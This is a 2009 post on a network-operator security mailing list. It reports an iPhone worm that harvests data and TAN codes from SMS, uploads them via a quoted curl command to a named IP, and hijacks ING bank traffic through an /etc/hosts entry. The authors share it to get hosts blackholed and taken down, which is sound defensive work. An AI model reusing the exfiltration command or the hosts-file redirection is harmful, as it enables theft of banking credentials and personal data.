[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.
Scott A. McIntyre
scott at xs4all.net
Sun Nov 22 11:43:39 EST 2009
Hi,
On Nov 20, 2009, at 15:29 , Tim Wilde wrote:
> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On 11/20/2009 8:56 AM, Scott A. McIntyre wrote:
>> However, it does grab other data and upload it:
>>
>> curl 92.61.38.16/xml/a.php?name=$ID --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
>>
>> I've asked Team Cymru to blackhole that IP address, I've already done so here.
>>
>> AS | IP | AS Name
>> 47205 | 92.61.38.16 | HOSTEX HOSTEX autonomous system
>
> Hey Team,
>
> The IP has been added to the DDoS-RS list, you can see its entry in
> ddos-rsv2.txt:
[ snip ]
I realise this is mostly of interest to Apple fanbois like me, but, thought I'd update you all that the "bot" now specifically looks for "tan codes" in the SMS database and phones home for different instructions. On top of that, it is redirecting Dutch ING bank customers to a phishing site in Japan by creating a static /etc/hosts entry for the website.
I've asked JPCERT to try to kill hxxp :// 210 .233.73.206/internetbankieren/ but if anyone else has contacts that can do that, I'm sure they'd appreciate it over at ING bank.
Best regards,
Scott A. McIntyre
XS4ALL Internet B.V.
More information about the nsp-security
mailing list